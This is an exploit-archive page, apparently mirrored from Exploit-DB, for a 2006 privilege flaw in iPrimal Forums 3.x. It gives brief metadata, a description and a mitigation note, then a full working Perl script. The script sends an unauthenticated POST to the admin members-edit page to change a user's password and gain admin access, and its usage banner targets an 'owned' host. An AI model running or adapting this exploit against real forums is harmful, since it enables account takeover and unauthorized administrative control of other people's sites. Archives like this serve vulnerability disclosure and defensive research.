header-logo
Suggest Exploit
vendor:
Forums
by:
Bl0od3r
7,5
CVSS
HIGH
ChangePass
264
CWE
Product Name: Forums
Affected Version From: 3x
Affected Version To: 3x
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

iPrimal Forums Users(ChangePass) 3xPl0!t

This exploit allows an attacker to create a new user account with administrative privileges on a vulnerable iPrimal Forums installation. The attacker can then use the newly created account to gain access to the administrative panel and perform malicious activities.

Mitigation:

Upgrade to the latest version of iPrimal Forums and ensure that all user accounts have strong passwords.
Source

Exploit-DB raw data:

#!perl
#http://ipigroup.org/downloads/forums.zip
#Bl0od3r
#Germany
#shoutzz to all members of dC3 crew ,matrix_killer,eddie14
#special to str0ke
use IO::Socket;
if (@ARGV<4) {
&header;
} else { &start };

sub start() {
$host=$ARGV[0];
$path=$ARGV[1];
$user=$ARGV[2];
$passwd=$ARGV[3];
$post="usersname=".$user."&password=".$passwd."&email=test%40test.com&name=Dummy+user&tagline=Im+a+dumy+user&location=Ohio&bday=1983-11-20&job=Being+a+test+dummy&interests=Anything&bio=I%5C%5C%5C%27ve+been+sitting+on+this+db+my+whole+life.++HELP%21&signature=This+is+my+signature.&url=http%3A%2F%2Fipigroup.org&aim=myaim&yahoo=myyahoo&msn=mymsn%40hotmail.com&icq=546546&submitupdate=Update";
$len=length($post);
$sock=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die ("Error");
print $sock "POST ".$path."admin/index.php?p=members&edit=".$user." HTTP/1.0\n";
print $sock "Host: ".$host."\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$len."\n\n";
print $sock $post;

print "[+]Seems like your account has been created!Now try to login in :";
print "\n[+]User:$user\t[+]Password:$passwd";
}

sub header() {
print("
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\t\t~~iPrimal Forums Users(ChangePass) 3xPl0!t~~
\t\t[+]By Bl0od3r
\t\t[+]dC3 Crew
\t\t[+]Usage:script.pl owned.org /script/ admin yeesss
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
");
}

# milw0rm.com [2006-11-06]

Navigation

Suggest Exploit

Services By CQR